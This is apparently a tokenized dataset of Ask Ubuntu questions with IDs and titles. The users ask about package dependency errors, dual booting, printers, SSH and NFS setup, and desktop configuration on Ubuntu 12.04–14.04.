/usr/bin/dpkg returned an error code ( 1 ) jim @ jim-inspiron-660s : ~ $ now i 've downloaded the iso 'boot-repair=disk- 64 bit ' and i 'm tempted to try that and see what happens , if i regain esp , refind , etc . even though esp is lost i am still able to start the computer and choose ubuntu or windows .
490484	ubuntu 12.04 not remembering settings	ubuntu can not remember many settings i have set . for example , when i customize the keyboard layout , it does not remember it after restart . nor does it remember which programs that i have locked onto the launcher . is there a fix to this ? ( it does however remember which wallpaper i wanted to use ) i 'm on ubuntu 12.04 lts
490487	apt . delete package `` dependencie '' , without deleting package `` needed ''	i want to delete nautilus , but i have a cool script named folder color , that has in his dependencies nautilus . can i mark in apt keep package folder-color and delete nautilus ?
490488	how to read text message that resides on it like windows with sony ericsson wireless manager	i am using sony ericsson for a mobile broadband connection ; it woks perfectly but i want to know if there any way to read text messages that resides on it like windows with sony ericsson wireless manager [ 1
490496	i want to create a shorcut which execute a code when clicked	i want to create a file , which will execute a code in terminal when dbl clicked.. can this be done ? if yes , how ?
490500	installing ubuntu 14.04 inside windows 8	installing ubuntu 14.04 inside windows 8 ; can anybody help me ? is it safe to install ubuntu inside windows 8 ? i am not getting info about installing ubuntu in windows 8 . in windows 7 we can use wubi , but what about with windows 8 ?
490501	init.d script not updating git repository	i have the following init.d script running on my ubuntu machine : # /etc/init.d/do-updates cd /home/ubuntu/fox ; git pull sudo /home/ubuntu/fox/batch_update_process.py 1 > > /home/ubuntu/updates_log.txt it is correctly runs and write to updates_log.txt , however it is not updating the git repository . any ideas why this is occurring or what i need to do to fix this ?
490504	14.04 : icons missing in system settings	this problem has appeared here before , but in my case it has a special twist : i am running ubuntu 14.04 , fresh install , no upgrade . the icon for the system settings shown in the launcher ( the wheel with a stick through it ) is perfectly there when i first start a session . however , after clicking on it once , it just disappears and a question mark on a gray background shows up . the same happens with the terminal icon in the launcher : first it is there , after opening one terminal and then closing it again , the icon is gone . inside the system settings all the items are there and can be clicked ( and work ) , but many of them have no icon . i have tried all the remedies given in the earlier posts . none of them works . in particular , sudo apt-get install ubuntu-desktop shows no change . running gnome-control-center in a terminal gives first a lot of error messages of the kind ** ( unity-control-center:3443 ) : warning ** : could not find icon 'preferences-desktop-wallpaper' so , what to do ?
490507	ca n't find programs i installed	i need help learning how to install programs without software center . or at least finding a couple programs i just installed . i downloaded he forio ide for julia , and have no idea whether or not it installed properly . so , i just decided to install julia by itself , but now i can not find it . i installed xfce 4 appfinder to help me find forio and julia , and i ca n't find that ! i 'm sure there are more programs that i 've installed and never found . anyway , i may be too incompetent to use anything other than microsoft . to install julia and xfce , i used these commands : sudo add-apt-repository ppa : staticfloat/juliareleases sudo add-apt-repository ppa : staticfloat/julia-deps sudo apt-get update sudo apt-get install julia sudo apt-get update & & sudo apt-get install xfce4-appfinder anybody know what i should do ?
490511	postgresql vs postgresql-server-dev package	what is the difference between postgresql and postgresql-server-dev packages . what are the purposes served by installing different packages and what are the use-cases of these ?
490514	opendkim-genkey txt record in ubuntu 14.04	after upgrading to ubuntu 14.04 and generating keyfile using opendkim-genkey i 've noticed the txt file is broken like : myselector._domainkey in txt ( `` v=dkim1 ; k=rsa ; `` '' p=dhijvfhbdifg54t345t3456h3457 '' ) ; -- -- - dkim key myselector for mydomain.com i can only assume this is ok , but do i need to reformat this in my dns as before with all parameters in one block ? and does anyone know the reason behind this ?
490515	downgrading libreoffice from repository	i am trying to downgrade from libreoffice 4.3.0~rc1 to the most recent stable 4.2.0 . this is on account of this bug . i have seen this question about how to downgrade to a specific ppa version of libreoffice which suggests sudo apt-get install libreoffice=version but i ca n't figure out how to specify the version . libreoffice=4-2 or libreoffice=4.2 or libreoffice=4.2.0 all give me variations on e : version '4-2 ' for 'libreoffice was not found i have also tried sudo ppa-purge ppa : libreoffice/ppa sudo add-apt repository ppa : libreoffice/libreoffice-4-2 sudo apt-get update sudo apt-get install libreoffice but that also gives me the new , unworking 4.3 version . any suggestions ? i suppose i could install from the .deb files , but i 'd rather use a repository version if possible . note that : apt-cache policy libreoffice libreoffice : installed : 1:4.3.0~rc1-0ubuntu1~precise0.2 candidate : 1:4.3.0~rc1-0ubuntu1~precise0.2 version table : *** 1:4.3.0~rc1-0ubuntu1~precise0.2 0 500 http : //ppa.launchpad.net/libreoffice/libreoffice-prereleases/ubuntu/ precise/main amd64 packages 100 /var/lib/dpkg/status 1:3.5.7-0ubuntu6.1 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 1:3.5.4-0ubuntu1.1 0 500 http : //security.ubuntu.com/ubuntu/ precise-security/main amd64 packages 1:3.5.2-2ubuntu1 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/main amd64 packages but `` sudo apt-get install libreoffice=1:3.5.7-0ubuntu6.1.0 '' returns '' e : version '1:3.5.7-0ubuntu6.1.0 ' for 'libreoffice ' was not found ''
490524	replacing current software	if i replace my current software ( windows 7 ) will i lose all of my music , videos etc . also will i be able to download itunes on ubuntu ? or what other software can i use for my iphone ?
490526	how to start vmware vix on ubuntu 14.04 ?	i have installed vmware vix on ubuntu 14.04 with the help of ubuntu forums . but i do n't know how to start gui for the same . is there any command to start the gui or script to run . i used below method to install vmware : apt-get install build-essential linux-headers-`uname -r` downloaded vmware-vix-1.12.3-1410761.i386.bundle to ~/downloads and then : sh ~/downloads/vmware-vix-1.12.3-1410761.i386.bundle then it prompted gui to install everything went smoothly , it did not give any error . any ideas how do i get the graphical interface ?
490529	move ssd drive with win7 and ubuntu 12.04 already installed to new laptop	i want to move my ssd drive that has dual boot with win 7 and ubuntu 12.04 installed to my new laptop . i 'm using grub for the dual boot . i was hoping life would be easier with just physically moving the drive but it turned to be much harder . the new laptop comes with an internal hdd which i formatted to ntfs . now i have boot problem , i was able to load ubuntu but i had no network . i 've set the ahci mode in bios . now i 'm using ubuntu from the live cd and everything works fine . please help me out with this one , what steps should i take to get a working setup ? i can live with reinstalling win 7 but i ca n't afford losing my current ubuntu installation . i appreciate any help . 10x
490533	ubuntu dependency problems	my ubuntu 12.4 box has been off for 10 days . upon returning to it i have found that there 's no sound and steam games ( for linux ) wo n't start . there is a dependancy problem . i 'm guessing is causing the sound & graphics problems . i ca n't update all my packages because aptitude keeps telling me that dpkg has errors . it appears to be to do with some dependancies being out of date . here is some of the most informative bits from the masses of reports spewed by apt-get and aptitude : the following packages have unmet dependencies . apache2-mpm-prefork : depends : apache2.2-bin ( = 2.2.22-1ubuntu1.5 ) but 2.2.22-1ubuntu1.6 is installed apache2.2-common : depends : apache2.2-bin ( = 2.2.22-1ubuntu1.5 ) but 2.2.22-1ubuntu1.6 is installed libapache2-mod-php5 : depends : php5-common ( = 5.3.10-1ubuntu3.11 ) but 5.3.10-1ubuntu3.12 is installed openssh-server : depends : openssh-client ( = 1:5.9p1-5ubuntu1.2 ) errors were encountered while processing : procps udev bluez cups network-manager apache2.2-common apache2-mpm-prefork apache2 libsolid4 libkio5 kdoctools kdelibs-bin libkparts4 libkde3support4 libkdewebkit5 libkemoticons4 libkfile4 libktexteditor4 libkhtml5 kdelibs5-plugins libapache2-mod-php5 libkmediaplayer4 libknewstuff3-4 libknotifyconfig4 libkprintutils4 libplasma3 openssh-server ssh this is what i tried so far ( based on googleing ) : apt-get update apt-get -f install apt-get clean apt-get autoremove apt-get -- fix-broken install aptitude upgrade aptitude upgrade says this : http : //pastebin.com/mjuln9gy my /etc/apt/sources.list : deb http : //gb.archive.ubuntu.com/ubuntu/ precise main restricted universe multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ precise main restricted universe deb http : //gb.archive.ubuntu.com/ubuntu/ precise-security main restricted universe deb http : //gb.archive.ubuntu.com/ubuntu/ precise-updates main restricted universe deb-src http : //gb.archive.ubuntu.com/ubuntu/ precise-security main restricted universe deb-src http : //gb.archive.ubuntu.com/ubuntu/ precise-updates main restricted universe how can i fix this dependency issue ? also : this has happened before after i returned from a holiday . how can i prevent this form happening again ?
490536	what is probability of porting art to ubuntu ?	ubuntu is going to be converged , so we are talking about unified system . but i want mostly to run android apps on ubuntu touch . is it possible for canonical or enthusiasts to port art and run android apps natively . ( dalvik is in the past ) .
490538	speeding up hp elitebook pointstick	any idea how to speed up the pointstick in hp laptop ? in thinkpad i do it with this command : echo 200 | sudo tee /sys/devices/platform/i8042/serio4/serio5/speed but this file is not available on my hp laptop . any ideas ?
490540	ububtu server 14 with cups lpd/lpr support	i 'm using ubuntu 14.04 with lamp , samba and cups installed by server media installation . i would like to also set this up as a print server with cups and lpd/lpr support . i have a similar setup in rhel 4 . in rhel , it uses cups-lpd and the service inetd ; but i do n't know what packages to use in ubuntu . there 's xinetd for ubuntu but i saw somewhere that inetd ( bsd ) works better than xinetd . and what packages would i use in place of cups-lpd ? is there someone who can provide a step-to-step way to configure this ?
490541	how to install ubuntu on macbook pro 10.8.5	i 'm new to ubuntu and need help downloading ubuntu onto my macbook pro 10.8.5 . i 'll eventually need it to run ros . i 've looked through numerous documentations on what to install , but am still so lost ... i 've installed virtualbox . could someone please help me ? d : thanks so much ! : )
490542	re installing hp photosmart c4240 allin	how do i install a hp photosmart c4240 all in one printer scanner copier on ubuntu 12.04
490544	how can i either lock items in the launcher or restore a set of items in the launcher ?	i admin a batch of ubuntu 14.04 desktop machines in a public library ( they are diskless and boot via drbl ) . sometime users ( i 'm guessing kids ) remove icons from the launcher . i want to either prevent that or have a simple means of restoring the launcher 's state ( eg via an autostart script ) . how can i do that ? i found this ( old ) thread http : //ubuntuforums.org/showthread.php ? t=2023390 , but there are no specific details and i ca n't seem to figure out how to use dconf .
490545	printing from ubuntu to windows server 2008 r2 over ipp generates print errors	i 'm printing from ubuntu 14.04 to a windows 2008 ( r2 ) and 2012 ( r2 ) ipp print environment . why do i see following message in the printer queue : `` processing - print error '' while the print job is processed and transfered to the windows print server after some time . also closing the print job does not function . printer status remains `` idle - waiting for job to complete '' . i 'm using both a http and a https connection as a printer port resulting in the same behaviour.the reason i use http ( s ) is that i want to print over the internet to my corporate windows print server . what is happening , why this behaviour ? i have asked same question to cups.org , see conversation answer from cups.org was : you need to file bugs with your linux distros . the jobs are getting successfully submitted to the windows ipp server , but we can not wait for the job to complete since microsoft does not correctly implement ipp . the job should still complete , and the printer is going idle as expected . the only thing i can guess is that the linux ui is treating the ipp conformance keywords as errors when they should be treated as informational . i do n't think there is anything for us to do here ; your linux distros will need to resolve the presentation issues on their end , but everything appears to be working correctly on the cups side of things .
490546	finding audio limits of usb microphone	is there a command to find the audio recording limits of a usb microphone example : it 's rated for only 16000hz or 44100hz thanks
490551	how to install / run freefem++	after sudo apt-get install freefem++ ran successfully , my ubuntu 14 . 04 system does not seem to recognize the command `` freefem++ '' . any ideas ? things seem to be in /usr/share/doc/freefem++ ( but no executables ) . sudo dpkg -i ./var/cache/apt/archives/freefem++_3.26-2-3_amd64.deb did not much either . not sure what to do next to get this software to work .
490555	after updating ubuntu 14.04 to ubuntu-proposed using software updater on jun 27th built-in notebook display keeps showing boot screen	after updating ubuntu 14.04 using software updater to ubuntu-proposed automatic displays configuration stopped working correctly . my built-in notebook display keeps showing ubuntu boot screen ( the one with ubuntu logo and 5dots as `` progressbar '' ) . other display ( s ) are correctly switched to ubuntu login screen as expected . same problem remains after login . i need to switch off built-in display and turn it back on using `` displays '' settings to solve the problem . do you have any idea if it is some configuration problem or is it a bug and i simply downgrade everything to trusty/trusty-updates ? my configuration is : ubuntu 14.04lts , all packages up to date with trusty-proposed repository notebook lenovot520 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf119m [ quadro nvs 4200m ] ( rev a1 ) thank you
490560	unable to find a medium containing a live file system	i downloaded the ubuntu-14.04-desktop-amd64 image file to my desktop then burnt it to disk . when i try to put it on my computer with the disk , it seems to be loading fine then this shows up : unable to find a medium containing a live file system i have tried it several times but the same thing happened . my computer is acer aspire 5733 windows 7 . help me please . this is driving me nuts .
490561	asrock z87 extreme 3 motherboard	i have assembled my own pc following the instructions in linux format magazine 185 . the motherboard is asrock z87 extreme 3 . everything works great ... it was much easier than i expected . however , the onboard audio does not work ( the usb headphones do ! ) and the camera does not show a picture . both are detected ... but neither works . the camera ( logitech ) did work with my dell lap top running ubuntu 14.04 . the new rig is also running 14.04 ( no dual boot ) . i know the drivers are supplied by the kernel ... but , why would it work on one machine and not the other ?
490562	dell inspiron 15 7000 restarts on shutdown	i 've got a dell 15 inspiron 7000 series with win-8 pre-installed . i 've installed ubuntu 14.04 . but when i shut down the system , it restarts after 5 seconds . i 've tried this but nothing . can you help me ? should i report a bug ?
490563	ssh , problem with headless device	i have ubuntu 14.04 installed on a headless device . since the last update and shutdown it is not possible to connect via ssh anymore . nmap shows the machine is up and in the network , all ports are closed . when i connect the hard drive of the headless device to my laptop , it is possible to connect from another machine . it seems it is somehow due to the different network card .
490571	gui applications does n't ask for sudo password	i have bought a vps and installed ubuntu 12.04 on it . however i needed a gui , so i installed xubuntu-desktop packages and a vnc server . that part just works fine , i also created a user , and added it to the sudo group . the problem is that , with that user the applications does not ask for sudo password like it normally happens . so this way i ca n't really take much use of it . is there any way to make it behave that way ? thanks for the help !
490574	nfs configured - clients can not connect	i 'm trying to get nfs working on my ubuntu server 14.04 again . it was originally working until last weekend , but when i tried to configure samba everything we n't fubar . now none of my devices can connect with the nfs share . this is what i added this to my /etc/exports : /export/storage 192.168.0.1/24 ( rw , async , insecure , no_subtree_check ) and i added this to my /etc/fstab : /storage /export/storage none bind 0 0 my file permissions for both /storage & /export/storage are set to 775 . i 'm running raid5 and created a logical volume that 's mounted to /storage . when i do df -h my logical volume is correctly displayed : /dev/mapper/lvm -- raid-storage 511m 3.4m 508m 1 % /storage read several troubleshooting articles on the web , but everything seems to be configured correctly . does anyone have an idea what i 'm doing wrong ? really hope someone can help me out , because i 'm struggling massively with this one . i ca n't find a solution on the web and simply do n't have a clue how to fix this . many many thanks in advance !
490581	redirect terminal through tor ?	there are some sources blocked in my country . so when i do apt-get update i get th ane error below : alexander @ alexander-pc : ~ $ sudo apt-get update [ sudo ] password for alexander : ign http : //security.ubuntu.com trusty-security inrelease ign http : //extras.ubuntu.com trusty inrelease hit http : //security.ubuntu.com trusty-security release.gpg get:1 http : //dl.google.com stable inrelease [ 1,540 b ] hit http : //extras.ubuntu.com trusty release.gpg 100 % [ 1 inrelease gpgv 1,540 b ] [ waiting for headers ] [ waiting for headers ] [ wasplitting up /var/lib/apt/lists/partial/dl.google.com_linux_chrome_deb_dists_stabign http : //dl.google.com stable inrelease e : gpg error : http : //dl.google.com stable inrelease : clearsigned file is n't valid , got 'nodata ' ( does the network require authentication ? ) alexander @ alexander-pc : ~ $ ^c when i use proxy it works perfectly . now i do n't have any proxy can i use tor ? my question is : can i redirect the terminal through tor ?
490584	brightness not dimming on battery	on my lenovo yoga pad 2 with ubuntu 14.04 there is no option to dim the screen when in battery mode . there is one option `` dim screen to save power '' but it does n't seem to have any effect : how can i set the brightness to another dim level on battery power in unity ?
490585	recover file deleted on encrypted hard drive ?	when i installed linux i chose to encrypt my hard drive , including the home folder . if i delete a file in the normal fashion ( not securely deleting it with overwrites ) will it not be recoverable by virtue of being on an encrypted drive ?
490586	setting up sony vaio mode switch buttons	i have a sony vaio vgn-sr200 series , vgn-sr250fn exactly , that has a mode , setting , and switch mode buttons . has anyone configured this buttons to work with ubuntu 14.04 lts ? is there any application for this ?
490587	many files in /var/lib/dpkg/info/ corrupted ; how to recover	when i run sudo apt-get ( anything ) , i invariably get this error : dpkg : unrecoverable fatal error , aborting : files list file for package 'thunderbird-gnome-support ' is missing final newline e : sub-process /usr/bin/dpkg returned an error code ( 2 ) after some googling , i learn that this is because /var/lib/dpkg/info/thunderbird-gnome-support.list is corrupt . i cat that file , and it most certainly is corrupt - it should be a plain text file containing a list of absolute file paths , but instead is a binary file . now i inspect the other files in the same directory , and it appears that many of them are corrupt in the same way . this indicates that something went severely wrong in my file system , that caused many files to get corrupted . unfortunately , it happened to affect system files . how do i recover from this ? more details : just prior to this , i installed a routine update when ubuntu prompted me . it was a new linux kernel , and some system file headers . after restarting , these were my specs : os specs : $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 13.10 release : 13.10 codename : saucy $ uname -a linux brendang-linux 3.11.0-24-generic # 41-ubuntu smp mon jun 9 20:36:00 utc 2014 x86_64 x86_64 x86_64 gnu/linux immediately after restarting for the first time , the entire file system appeared to be mounted as read only ( which has not been the case previously ) . subsequently i have had to reboot several times before the system worked . i have done touch /forcefsck in between them to ensure that fsck runs , and am not sure what else needs to be done .
490589	error with package manager	this is the error message : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_universe_i18n_translation-en , e : the package lists or status file could not be parsed or opened . i am running ubuntu 12.04
490590	rdp to amazon ec2 ubuntu instance	i 've set up an amazon ec2 instance . i allowed rdp from any ip in the security groups , installed and started xrdp and added a user with a new password . however when i try to remote connect , the connection simply fails . does anyone have any experience with this that could point me in the right direction ? edit : how i set it up sudo aptitude update sudo aptitude install ubuntu-desktop sudo aptitude install xrdp sudo /etc/init.d/xrdp start sudo adduser username sudo adduser username sudo then i set my ec2 security group to be : type protocol port range source all tcp tcp 0 - 65535 0.0.0.0/0 ssh tcp 22 0.0.0.0/0 http tcp 80 0.0.0.0/0 rdp tcp 3389 0.0.0.0/0 all icmp all n/a 0.0.0.0/0 edit 2 : more details , for yaron i have not set up iptables . my netstat output , with my ssh hostname changed active internet connections ( w/o servers ) proto recv-q send-q local address foreign address state tcp 0 0 ip-10-85-146-191.e:3389 host163-5-static.2:2006 established tcp 0 0 ip-10-85-146-191.e:3389 host163-5-static.2:1169 established tcp 0 0 ip-10-85-146-191.e:3389 host163-5-static.2:2087 established tcp 0 0 ip-10-85-146-191.e:3389 173.244.215.194.s:48345 established tcp 0 256 ip-10-85-146-191.ec : ssh somehostname . :26930 established tcp 0 0 ip-10-85-146-191.e:3389 66.85.144.237:46267 established tcp 0 0 ip-10-85-146-191.e:3389 173.244.206.19.st:42205 established tcp 0 0 ip-10-85-146-191.e:3389 vps.node70.doip.n:40741 established tcp 0 0 ip-10-85-146-191.e:3389 host163-5-static.2:4515 established
490593	ubuntu laptop , phone and tablet	i leave in the uk and a fan of ubuntu , i would like to know were i can get an ubuntu laptop , phone and tablet
490596	ubuntu server 14.04 - 64 bit version ok for old amd64 machine ?	i 've got an old amd64 machine ( amd athlon 64 3000 ) i 'd like to run ubuntu server 14.04 on . however , i see there 's no longer an amd64 version . will 14.04 be a problem , or should i just use v. 12.04 lts amd64 instead ? thanks , matt
490597	i accendentally moved the ubuntu folder after installing it to vista	i successfully installed ubuntu to my vista machine but in digging around the files i accidentally moved the folder . now , i do n't know where it belongs . will moving it back restore ubuntu and where do i need to put it ?
490599	14.04 does not find my windows 8 partition	i am trying to upgrade 12.04 to 14.04 and 14.04 does not find my windows 8 partition it only finds my 12.04 .
490601	install canon scanner	i can not install my canon canoscan lide 70 flatbed scanner on my dell dimension 3000 computer on which i replaced windows xp with ubuntu 12.04.4 . the installation disk does not operate . it this device compatible with ubuntu ?
490603	i am trying to install wine on ubuntu 14.04 and it wont let me in the software center an when i try the terminal it wont work	the following packages have unmet dependencies : wine1.7 : depends : wine1.7-i386 ( = 1:1.7.20-0ubuntu1 ) but it is not installable recommends : gnome-exe-thumbnailer but it is not going to be installed or kde-runtime but it is not going to be installed recommends : fonts-horai-umefont but it is not going to be installed recommends : fonts-unfonts-core but it is not going to be installed recommends : ttf-wqy-microhei e : unable to correct problems , you have held broken packages .
490604	ca n't log out of ubuntu when steam is running	i 'm running into a problem where i can not log out of ubuntu if i try to do so when steam is running . if i try to log out with steam running , steam will exit , but i will stay logged in . if i try to log out another time ( by selecting it from the menu in the task bar ) , the option does n't appear ( and the same happens if i try to shut down the computer ) . if i exit steam first , i can then log out as normal . does anybody have an idea for what i can do to resolve this issue ? thanks .
490605	synaptic ca n't find firmware-b43-installer	i recently installed xubuntu on a dell latitude d630 and i had to install drivers for a broadcom bcm4311 card . i downloaded b43-fwcutter and firmware-b43-installer on my other computer and put them on a flashdrive to transfer . i extracted both packages and was unable to install them through the terminal so i installed synaptic ( via ethernet ) and was only able to find and install b43-fwcutter in synaptic . does anyone know what might be wrong ?
490606	close to dock without quitting like macos	is there a way to make ubuntu close application windows without actually quitting them and show them as active/open applications on the dock like on a mac ? i use a mac at work and i want my ubuntu experience to match as closely as possible . i use cairo-dock .
490607	virtual workspaces opacity	in 14.04 , desktop ubuntu , i have the option to enable virtual work spaces from system settings > appearance . this is great but i would like to change the opacity of the dimmed out desktops . they are very dark and donât let me see properly what is on that work space . it there a way to change the opacity of the virtual work spaces ? thanks , kam270
490608	software update aplication not work	after a failed update system , i restarted my computer and all be ok but i ca n't launch the software update aplication , it 's working , but i ca n't see the status of updates or any information .
490612	how do i automate the activation of python environment	i have created an environment , using virtualenv , for python 3.4.1 which i installed on /opt . the environment is on ~/py34 . every time i want to use it , i have to type : source py34/bin/activate python is there anyway to create a shortcut , so that i do n't have to type these commands every time i want to use it ?
490616	modprobe : 'invalid nodule format ' , yet works after insmod	i am having a problem with ubuntu 12.04 not properly recognising a custom made kernel module . the kernel module is a spoof of raw1394 . so that programs that look for the presence of a raw1394 module in memory still work properly , even though the actual module that handles ieee 1394/firewire communication is different . the instructions for creating the dummy raw1394 module are at wiki.sofa-framework.org . the problem is that to load the kernel module i have to use insmod every time . when after rebooting i try to load the raw1394 kernel module i get the following error message : $ sudo modprobe raw1394 fatal : error inserting raw1394 ( /lib/modules/3.5.0-51-generic/misc/raw1394.ko ) : invalid module format however , if i run the following sequence of commands it all works fine : $ sudo insmod raw1394.ko $ sudo modprobe raw1394 i ca n't see how it can be a problem with mismatched version : $ uname -a linux mech801 3.5.0-51-generic # 77~precise1-ubuntu smp thu jun 5 00:48:28 utc 2014 x86_64 x86_64 x86_64 gnu/linux here are the md5 hashes . the files are the same length but i assume that insmod must be changing something internally as it inserts the module . both files are 3274 bytes in size . $ md5sum /lib/modules/3.5.0-51-generic/misc/raw1394.ko ./raw1394.ko ab06501bba1372f57115125bc7a24dfb /lib/modules/3.5.0-51-generic/misc/raw1394.ko c3c3d2b4e2fe174a76b90af33eefc5e0 ./raw1394.ko is there something i am missing that is causing this invalid module format problem ?
490620	difference between $ logname and logname	when echo $ logname or logname commands run normally get same result like following : pandya @ pandya-desktop : ~ $ echo $ logname pandya pandya @ pandya-desktop : ~ $ logname pandya but i found their difference and explained in my answer .
490622	dual booting windows 8.1 and ubuntu 12.04	i got the dual boot to work well for about 2 months , but am now getting an efi error `` inability to find 'drivemap ' '' on the windows side . any ideas on how to fix this ?
490624	ssh onto new ubuntu 14.04 server	this is my first server i have set up and i used ubuntu 14.04 to run it . i opted not to use the server install because the regular ubuntu was easier to setup . now i wanted to make the server available for ssh and vnc so that i could manage it remotely and disconnect the monitor , but i can not figure either of them out . i installed openssh server but every time i try to connect with my mac it says `` connection closed by server ip '' it is seriously the most frustrating thing because everywhere i look online it just says install openssh and it should work . i dont completely understand the modifications to the sshd_config page or if i actually need to modify it for everything to work . i have pinged both ways and both work . i can connect to my mac from the ubuntu server but not the other way . all firewalls are off . can someone please help me ?
490626	ubuntu with both 32bit and 64bit libcurl	im running a c++ application and asterisk in 64bit ubuntu machine.my c++ application needs 32bit libcurl . and asterisk needs 64bit libcurl to do some http calls in the dialpaln.can i keep both 32bit and 64bit libcurl in the same machine and config asterisk to lookup for 64bit libcurl ?
490628	will not play dvd with vlc missing drivers	last year i put ubuntu 13.10 in this laptop with vlc to play dvds had problem with drivers called samsung and they told me to install drivers , but now i put ubuntu 14.04 in and no longer have drivers . i think i entered apt-get css to get them does any 1 have any idea.last year laptop was under warranty now it isnât so if i call them they will charge me for the answer
490634	application indicator icon not changing until clicked	i have an application indicator which shows the moon phase/orientation as its icon ( along with a text label ) . when the indicator does an update ( several times per hour ) , the icon is recreated ( as an svg file ) and so the icon changes over time . recently , the icon is not showing any change unless i mouse click the icon ( or label ) . i 'm on ubuntu 14.04 64 bit and my indicator uses python 3 and appindicator3 . the code below is representative of the issue and shows an icon which should change every three seconds ( i made the interval three seconds to see the issue quickly - in reality the icon changes hourly at most ) . the icon itself is an svg file and shows a numerical count , starting from zero and increments every three seconds . i have tested on ubuntu 12.04 and xubuntu 12.04 ( via virtualbox ) and the icon does change on each three second update . testing on ubuntu 14.04 , the icon does not change unless i click on it . if i change the label text on each update , the icon will also change , but only if i do n't repeat the same text for the label . is anyone able to confirm this please ? i can not find a bug report and the api for the python appindicator is no longer available so i can not tell if something has changed or been deprecated . # ! /usr/bin/env python3 try : from gi.repository import appindicator3 except : pass from gi.repository import glib , gtk import os class indicatortesticon : name = `` indicator-test-icon '' svg_icon = `` . '' + name svg_file = os.getenv ( `` home '' ) + `` / '' + svg_icon + `` .svg '' def __init__ ( self ) : self.count = 0 self.indicator = appindicator3.indicator.new ( indicatortesticon.name , `` '' , appindicator3.indicatorcategory.application_status ) self.indicator.set_icon_theme_path ( os.getenv ( `` home '' ) ) self.indicator.set_status ( appindicator3.indicatorstatus.active ) def main ( self ) : self.update ( ) glib.timeout_add_seconds ( 3 , self.update ) gtk.main ( ) def update ( self ) : self.buildmenu ( ) self.createicon ( ) self.indicator.set_icon ( indicatortesticon.svg_icon ) # self.indicator.set_label ( `` static label '' , `` '' ) # using a static label , the icon does not change unless clicked with the mouse . self.indicator.set_label ( str ( self.count ) , `` '' ) # using a dynamic label ( which does not repeat ) does change the icon . self.count += 1 return true def buildmenu ( self ) : menu = gtk.menu ( ) quitmenuitem = gtk.imagemenuitem.new_from_stock ( gtk.stock_quit , none ) quitmenuitem.connect ( `` activate '' , gtk.main_quit ) menu.append ( quitmenuitem ) self.indicator.set_menu ( menu ) menu.show_all ( ) def createicon ( self ) : header = ' < ? xml version= '' 1.0 '' standalone= '' no '' ? > ' \ ' < ! doctype svg public `` -//w3c//dtd svg 1.1//en '' `` http : //www.w3.org/graphics/svg/1.1/dtd/svg11.dtd '' > ' \ ' < svg xmlns= '' http : //www.w3.org/2000/svg '' version= '' 1.1 '' viewbox= '' 0 0 100 100 '' > ' text = ' < g > ' \ ' < text x= '' 0 '' y= '' 75 '' font-family= '' verdana '' font-size= '' 100 '' fill= '' white '' > ' + str ( self.count ) + ' < /text > ' \ ' < /g > ' footer = ' < /svg > ' with open ( indicatortesticon.svg_file , `` w '' ) as f : f.write ( header + text + footer ) f.close ( ) if __name__ == `` __main__ '' : indicatortesticon ( ) .main ( ) fyi : submitted a bug report https : //bugs.launchpad.net/ubuntu/+bug/1337620
490640	dpkg problem in ubuntu 14.04	i am on 64 bit ubuntu 14.04 . laptop : inspiron n5110 i tried to intall pepperflashplugin using ubuntu-software-center , but it froze after some time so i closed the ubuntu-software-center . then ran `` sudo apt-get install flashplugin-installer '' it gave me this error '' e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem '' when i ran sudo dpkg -- configure -a . nothing happens but terminal froze at with the this `` setting up pepperflashplugin-nonfree ( 1.3ubuntu1 ) ... '' i am not able to install anything now , help me out of this problem .
490644	ubuntu 14.04 x64 hpmini 100-3100 getting stuck	here is the thing : i install last ubuntu version in a hp mini 110-3100 with n455 1.66ghz 64bit i-atom processor and 2gb ram , should i install ubuntu 32bit ? because , 64 bit is getting stuck for no reason and i have to do an hard-shutdown to my pc thanks !
490645	how can i use firefox to take full page screenshots from command line ?	i need to take a screenshot of a whole web page . i have seen how can i take a full page screenshot of a webpage from the command line ? where many ways to take a screenshot are proposed but i need to use firefox for a better effect .
490646	why no space on my harddrive ? storage summary on login different from df -h output	my email service ( zimbra ) has stopped and its crying low disk space via the warning : warning : disk space below threshold for /opt/zimbra/store.. on investigation , i 've found the weirdest thing i 've seen in ubuntu in forever . when i login via ssh , i get the usual summary of the server including the storage . it states : = > / is using 90.9 % of 12.79gb = > /mail is using 94.9 % of 88.58gb when i do a df -h the output shows that on /mail i only have 4kilobytes left and that usage is 100 % ? filesystem size used avail use % mounted on /dev/sda1 13g 12g 532m 96 % / udev 1.7g 4.0k 1.7g 1 % /dev tmpfs 343m 256k 343m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.7g 0 1.7g 0 % /run/shm dev/sdb5 89g 85g 4.0k 100 % /mail < ============this is what is crazy i have nagios on a remote server and it reads that i have 94.9 % usage just like in the login summary . so is df - h giving the wrong results which then makes zimbra die ? @ jakke : df -ih output as below : filesystem inodes iused ifree iuse % mounted on /dev/sda1 832k 235k 598k 29 % / udev 427k 443 426k 1 % /dev tmpfs 429k 323 429k 1 % /run none 429k 6 429k 1 % /run/lock none 429k 1 429k 1 % /run/shm /dev/sdb5 5.7m 378k 5.3m 7 % /mail additional info : a while ago the /mail partition was full and i added 10gb space into the /mail partition using gparted and space moved from 80gb to 90gb . could that be affecting it ? using ubuntu 12.04.2 lts
490648	how to create symbolic link to apache document root ?	my apache document root locate in /var/www and i created a directory called testwp on /var/www . i changed some privileges sudo chown -r $ user : $ user /var/www/testwp sudo chmod 755 /var/www/testwp but i cant access that directory from my web browser http : //localhost/testwp and it says 404 not found the requested url /testwp was not found on this server . how can i access like that ? can i do that ? please help me . thanks
